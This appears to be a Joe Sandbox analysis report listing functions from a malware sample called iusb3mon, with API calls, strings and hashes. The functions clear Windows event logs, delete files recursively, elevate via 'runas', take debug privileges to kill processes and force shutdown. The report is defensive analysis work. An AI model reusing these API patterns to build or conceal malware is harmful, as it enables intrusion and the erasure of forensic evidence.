Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$Load$CloseFreeHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID: SeDebugPrivilege$explorer.exe
API String ID: 1212985741-2721386251
Opcode ID: f2346b61b6acdf0729033ae6512dfcf8e85abebb1aa72bfd753c227dccf2a223
Instruction ID: e74081ae1c5df98471c062c069ef458b7e2679b5eaf4e83a0bf024cde5d0919e
Opcode Fuzzy Hash: f2346b61b6acdf0729033ae6512dfcf8e85abebb1aa72bfd753c227dccf2a223
Instruction Fuzzy Hash: B011A932604215BAFB20BBA1DD05FEEBBA9EF05724F10406AF600E50D0FB75AA509E64

Function 04D72E2C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 134fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 04D72E31
FindFirstFileA.KERNEL32(?,?), ref: 04D72EBF
DeleteFileA.KERNEL32(?,?,?,00000001), ref: 04D72F67
FindNextFileA.KERNEL32(00000000,00000010,00000001,?,?,00000001), ref: 04D72F7F
FindClose.KERNEL32(00000000,?,?,00000001), ref: 04D72F8E
RemoveDirectoryA.KERNEL32(?,?,?,00000001), ref: 04D72F97

Part of subcall function 04D84539: __EH_prolog.LIBCMT ref: 04D8453E

Part of subcall function 04D731FE: __EH_prolog.LIBCMT ref: 04D73203

Strings

*.*, xrefs: 04D72E97

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: FileFindH_prolog$CloseDeleteDirectoryFirstNextRemove
String ID: *.*
API String ID: 360591376-438819550
Opcode ID: fb7f0c1a6246a266bd2dbd9f966b7f0c4908ce017548b60e9955d607b99659ac
Instruction ID: d4b660f25e0d1f8bfce7aab7c6e522ecde33642793412f8c664f459025d655ee
Opcode Fuzzy Hash: fb7f0c1a6246a266bd2dbd9f966b7f0c4908ce017548b60e9955d607b99659ac
Instruction Fuzzy Hash: 6F418371E00249AEEB15EFE4DC94EEEB778EF05714F04819AE515E7290FB34AA44CB60

Function 04D73B39 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMON

Download Yara Rule

APIs

OpenEventLogA.ADVAPI32(00000000,04D97C38), ref: 04D73B93
ClearEventLogA.ADVAPI32(00000000,00000000), ref: 04D73BA2
CloseEventLog.ADVAPI32(00000000), ref: 04D73BA9

Strings

System, xrefs: 04D73B52
Security, xrefs: 04D73B4B
Application, xrefs: 04D73B44

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: Event$ClearCloseOpen
String ID: Application$Security$System
API String ID: 1391105993-2169399579
Opcode ID: d3bfe9a327ef84bd314fbbc31c52e8f99fcbe6f2b82448c1ac928ad95d43f127
Instruction ID: 6f93f8f5ad4bfc33ffd6cdd7a012b7f82a4ee9d686d3504d2eb2029722201326
Opcode Fuzzy Hash: d3bfe9a327ef84bd314fbbc31c52e8f99fcbe6f2b82448c1ac928ad95d43f127
Instruction Fuzzy Hash: 7301B171A0161CBBEB219F99D444AED7BB0FB05399F504499E804FA340F234EA04DFA1

Function 0058A342 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(51CEB70F,2000000B,00000000,00000002,00000000,?,?,?,0058A660,?,00000000), ref: 0058A3DB
GetLocaleInfoW.KERNEL32(51CEB70F,20001004,00000000,00000002,00000000,?,?,?,0058A660,?,00000000), ref: 0058A404
GetACP.KERNEL32(?,?,0058A660,?,00000000), ref: 0058A419

Strings

ACP, xrefs: 0058A360
OCP, xrefs: 0058A396

Memory Dump Source

Source File: 00000020.00000002.4542770236.0000000000571000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00570000, based on PE: true

Associated: 00000020.00000002.4542552949.0000000000570000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543102062.000000000059C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.000000000059E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005A2000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005E3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543915174.00000000005FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.00000000005FB000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.000000000063F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000655000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006CA000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006D5000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006DF000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006E1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006F7000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000741000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4545109642.00000000009D9000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_570000_iusb3mon.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 148e4e839e0fa6fd3f3a7060b22d11a0c4ef40a2b754114dbe1e50e80a3a8246
Instruction ID: 6c348429e9742eab368df6258385526aea84127dba1809950796d500e49b2d5a
Opcode Fuzzy Hash: 148e4e839e0fa6fd3f3a7060b22d11a0c4ef40a2b754114dbe1e50e80a3a8246
Instruction Fuzzy Hash: 7721A132A00100A6FF34BF14C905A977BA6FB54B54B568876ED0AF7110FB72DD41D352

Function 04D74652 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 04D74681

Part of subcall function 04D7461E: GetVersionExA.KERNEL32(?), ref: 04D74638

ShellExecuteExA.SHELL32(0000003C), ref: 04D746F2
ExitProcess.KERNEL32 ref: 04D746FE

Strings

<, xrefs: 04D746CD
runas, xrefs: 04D746DD

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: ExecuteExitFileModuleNameProcessShellVersion
String ID: <$runas
API String ID: 984616556-1187129395
Opcode ID: b0bb5abd5182f34049f4f0242a2438010c87af72acfc9663841af28a7bd17d6c
Instruction ID: f39a8628069899f7f698d0fd2ed9113b01cb1fa0efcec119f61d6c4b9e99469f
Opcode Fuzzy Hash: b0bb5abd5182f34049f4f0242a2438010c87af72acfc9663841af28a7bd17d6c
Instruction Fuzzy Hash: 82114272A14258ABEF25DBA5DC05BDD77B4FB08304F0004A9E708F62D0EB749648CF14

Function 04D772F5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35COMMON

Download Yara Rule

APIs

Part of subcall function 04D791B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00006365), ref: 04D79216
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 04D7922E
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 04D7923E
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 04D7924E
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 04D7925B
Part of subcall function 04D791B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 04D79268
Part of subcall function 04D791B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00006365), ref: 04D793F3

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 04D7732E
wsprintfA.USER32 ref: 04D77343

Strings

HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 04D77318
%d*%sMHz, xrefs: 04D7733B
~MHz, xrefs: 04D77313

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressProc$Library$FreeInfoLoadSystemwsprintf
String ID: %d*%sMHz$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
API String ID: 3469679427-2169120903
Opcode ID: bdab6046a6135d85e0b1232f27a3d9215f3e5f4a178893c875d174f70c8a0c4b
Instruction ID: 9094ca40c1bd9002a02032abb8473a71182bd2eab6751fa302359f9f54705a75
Opcode Fuzzy Hash: bdab6046a6135d85e0b1232f27a3d9215f3e5f4a178893c875d174f70c8a0c4b
Instruction Fuzzy Hash: 53F08971E10108BFEF04EBE4DC06DAEB77DDB04604F004555FF15E2191E6706A258B65

Function 0058A517 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00580B40: GetLastError.KERNEL32(?,00000008,005849F0), ref: 00580B44
Part of subcall function 00580B40: SetLastError.KERNEL32(00000000,?,00000006,000000FF), ref: 00580BE6

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0058A623
IsValidCodePage.KERNEL32(00000000), ref: 0058A66C
IsValidLocale.KERNEL32(?,00000001), ref: 0058A67B
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0058A6C3
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 0058A6E2

Memory Dump Source

Source File: 00000020.00000002.4542770236.0000000000571000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00570000, based on PE: true

Associated: 00000020.00000002.4542552949.0000000000570000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543102062.000000000059C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.000000000059E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005A2000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005E3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543915174.00000000005FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.00000000005FB000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.000000000063F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000655000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006CA000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006D5000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006DF000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006E1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006F7000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000741000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4545109642.00000000009D9000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_570000_iusb3mon.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: 8af6ac14e2340279268e0c3adbbf73f45a2dd52c9da723e2fdb785e825b77dfa
Instruction ID: a61a1d1309a163709ba25879e3a8cb0efe719d51c83dc4608ba2bb398f92e079
Opcode Fuzzy Hash: 8af6ac14e2340279268e0c3adbbf73f45a2dd52c9da723e2fdb785e825b77dfa
Instruction Fuzzy Hash: B1515D71E00606ABEF10FFA5CC45ABE7BB8BF54701F08446AED05F7194E77099458B62

Function 00589BB3 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00580B40: GetLastError.KERNEL32(?,00000008,005849F0), ref: 00580B44
Part of subcall function 00580B40: SetLastError.KERNEL32(00000000,?,00000006,000000FF), ref: 00580BE6

GetACP.KERNEL32(?,?,?,?,?,?,0057E45B,?,?,?,?,?,-00000050,?,?,?), ref: 00589C74
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0057E45B,?,?,?,?,?,-00000050,?,?), ref: 00589C9F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00589E02

Strings

utf8, xrefs: 00589D71

Memory Dump Source

Source File: 00000020.00000002.4542770236.0000000000571000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00570000, based on PE: true

Associated: 00000020.00000002.4542552949.0000000000570000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543102062.000000000059C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.000000000059E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005A2000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005E3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543915174.00000000005FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.00000000005FB000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.000000000063F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000655000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006CA000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006D5000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006DF000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006E1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006F7000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000741000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4545109642.00000000009D9000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_570000_iusb3mon.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 981f5c796ba3c23ac1355d04d529a2045e2c52c1a64b156894077497ceb337a0
Instruction ID: 78332ac4474119439da62171665f5ba4ccaa6d8d854d60a737c5edb1002457c3
Opcode Fuzzy Hash: 981f5c796ba3c23ac1355d04d529a2045e2c52c1a64b156894077497ceb337a0
Instruction Fuzzy Hash: 0971C371600603AADB24BB75CC4ABBA7BE8FF85700F184429FD06BB181FA71ED409765

Function 04D8ABEF Relevance: 6.0, APIs: 4, Instructions: 38keyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 04D8B4CB: GetWindowLongA.USER32(?,000000F0), ref: 04D8B4D7

GetKeyState.USER32(00000010), ref: 04D8AC13
GetKeyState.USER32(00000011), ref: 04D8AC1C
GetKeyState.USER32(00000012), ref: 04D8AC25
SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 04D8AC3B

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: b5f076e05377383b905a8a7b3f86a73bfd6f801cd77a132db1bece0bef79d1ff
Instruction ID: c29ded52d92ae6be6d87609d2ed4dad25f28013f480c8f8b8412d6b838ac20ac
Opcode Fuzzy Hash: b5f076e05377383b905a8a7b3f86a73bfd6f801cd77a132db1bece0bef79d1ff
Instruction Fuzzy Hash: C3F0A7BA74134B37F9383E681C91FB55115DFE0FD5F01842EE741AA2C48991F8025674

Function 00576340 Relevance: 6.0, APIs: 4, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00576460,0058F12C), ref: 00576345
UnhandledExceptionFilter.KERNEL32(?,?,00576460,0058F12C), ref: 0057634E
GetCurrentProcess.KERNEL32(C0000409,?,00576460,0058F12C), ref: 00576359
TerminateProcess.KERNEL32(00000000,?,00576460,0058F12C), ref: 00576360

Memory Dump Source

Source File: 00000020.00000002.4542770236.0000000000571000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00570000, based on PE: true

Associated: 00000020.00000002.4542552949.0000000000570000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543102062.000000000059C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.000000000059E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005A2000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005E3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543915174.00000000005FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.00000000005FB000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.000000000063F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000655000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006CA000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006D5000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006DF000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006E1000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.00000000006F7000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544283573.0000000000741000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4545109642.00000000009D9000.00000020.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_570000_iusb3mon.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 2d55de7f55d540d062c96c01c5628034d6722aed1961cf724592324dbfbbf3e4
Instruction ID: 9d948735b0d7867cf065ef9530901e896cba1050cab16fcfdb33328c27944a0a
Opcode Fuzzy Hash: 2d55de7f55d540d062c96c01c5628034d6722aed1961cf724592324dbfbbf3e4
Instruction Fuzzy Hash: DED01231000104FBE7402BE0ED0EA483F39FB54306F045C00FB09A50B1DBB14408AB63

Function 04D83F29 Relevance: 4.5, APIs: 3, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10fa3e579a0fa761453ae18069553751e34aad4d0fa45711291f6f160383eeb6
Instruction ID: ee19f7a576d1bf69b1034a134da95af06d952deae505bc2acf6506e92eee4726
Opcode Fuzzy Hash: 10fa3e579a0fa761453ae18069553751e34aad4d0fa45711291f6f160383eeb6
Instruction Fuzzy Hash: 89F01931608109ABDF01BF65CC08ABE7BB9FF04B44B04802AFC5ED5151EB36EA11DBA1

Function 04D739EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 04D78FF7: LoadLibraryA.KERNEL32(ADVAPI32.dll,00000000,SeShutdownPrivilege,?,?,04D739FA,SeShutdownPrivilege,00000001,?,04D7200F,?), ref: 04D7900F
Part of subcall function 04D78FF7: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 04D7901F
Part of subcall function 04D78FF7: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 04D7902A
Part of subcall function 04D78FF7: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 04D79035
Part of subcall function 04D78FF7: LoadLibraryA.KERNEL32(kernel32.dll,?,04D739FA,SeShutdownPrivilege,00000001,?,04D7200F,?), ref: 04D7903F
Part of subcall function 04D78FF7: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 04D7904A
Part of subcall function 04D78FF7: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 04D79092
Part of subcall function 04D78FF7: GetProcAddress.KERNEL32(00000000,GetLastError), ref: 04D7909A
Part of subcall function 04D78FF7: CloseHandle.KERNEL32(?), ref: 04D790A9
Part of subcall function 04D78FF7: FreeLibrary.KERNEL32(00000000), ref: 04D790BA
Part of subcall function 04D78FF7: FreeLibrary.KERNEL32(00000000), ref: 04D790C5

ExitWindowsEx.USER32(?,00000000), ref: 04D73A02

Strings

SeShutdownPrivilege, xrefs: 04D739ED, 04D739F4, 04D73A0A

Memory Dump Source

Source File: 00000020.00000002.4547080784.0000000004D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D70000, based on PE: true

Associated: 00000020.00000002.4547080784.0000000004DA1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DA8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000020.00000002.4547080784.0000000004DAA000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d70000_iusb3mon.jbxd

Yara matches

Similarity

API ID: AddressLibraryProc$Load$Free$CloseExitHandleWindows
String ID: SeShutdownPrivilege
API String ID: 3789203340-3733053543
Opcode ID: 0e40ad781bef0b5045251592b45b19ba92a3f227c7c84fa813eaa9ced0c33a52
Instruction ID: df1658083273d63dda7bdd296985bcbad522f9eda9267a95071690bea07d8915
Opcode Fuzzy Hash: 0e40ad781bef0b5045251592b45b19ba92a3f227c7c84fa813eaa9ced0c33a52
Instruction Fuzzy Hash: 53D0C93265D6607DF5153614BC1BB8A9396CB01730F20041BF114A81C06F96389111AD

Function 04D300CD Relevance: 2.6, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

ntdl, xrefs: 04D30185
l, xrefs: 04D3018C

Memory Dump Source

Source File: 00000020.00000002.4547003560.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_4d30000_iusb3mon.jbxd

Yara matches

Similarity

API ID:
String ID: l$ntdl
API String ID: 0-924918826
Opcode ID: c362b51c53e3eeabca090c6237b61e6bcf708d1a3817c6eecd03a2daff8ddda5
Instruction ID: 9e78f825f0561516dcbc22c6f69e5ae3e9e78df3b3427bf2614b05956224e7ce
Opcode Fuzzy Hash: c362b51c53e3eeabca090c6237b61e6bcf708d1a3817c6eecd03a2daff8ddda5
Instruction Fuzzy Hash: FC21DFB2B005209F9B2A9F54849862F7BE6FF457167118099E4059F358EB30ED02C7E1

Function 0058817A Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000020.00000002.4542770236.0000000000571000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00570000, based on PE: true

Associated: 00000020.00000002.4542552949.0000000000570000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4542911854.000000000058E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543102062.000000000059C000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.000000000059E000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005A2000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543297688.00000000005E3000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4543915174.00000000005FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.00000000005FB000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000020.00000002.4544036943.000000000063F000.00000002.00000001.01000000.0000000F.sdmpDownload File
